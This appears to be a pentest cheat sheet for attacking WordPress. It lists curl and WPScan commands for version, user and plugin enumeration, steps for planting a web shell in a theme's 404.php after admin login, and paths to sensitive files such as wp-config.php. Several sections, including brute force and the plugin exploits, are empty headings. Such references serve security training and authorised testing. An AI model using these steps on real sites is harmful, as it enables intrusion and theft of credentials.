githubEdit

WordPress

Discovery

# Version in meta tag
curl -s http://TARGET | grep 'content="WordPress'

# Version in readme
curl -s http://TARGET/readme.html

# Login page
/wp-login.php
/wp-admin/

WPScan Enumeration

# Basic scan
wpscan --url http://TARGET

# Enumerate users
wpscan --url http://TARGET --enumerate u

# Enumerate plugins
wpscan --url http://TARGET --enumerate p

# Enumerate vulnerable plugins
wpscan --url http://TARGET --enumerate vp

# Aggressive plugin detection
wpscan --url http://TARGET --enumerate p --plugins-detection aggressive

Brute Force (WPScan)


Theme Editor RCE (Authenticated)

  1. Login as admin

  2. Appearance → Theme Editor

  3. Select inactive theme (e.g., Twenty Nineteen)

  4. Edit 404.php

  5. Add web shell:

  1. Access: http://TARGET/wp-content/themes/twentynineteen/404.php?0=id


Metasploit RCE


Vulnerable Plugins

mail-masta LFI (unauthenticated)

wpDiscuz RCE (CVE-2020-24186)


Important Paths

Path
Description

/wp-config.php

DB credentials

/wp-content/uploads/

Uploaded files

/wp-content/plugins/

Plugins

/wp-content/themes/

Themes

/xmlrpc.php

XML-RPC API


Config File Locations

Last updated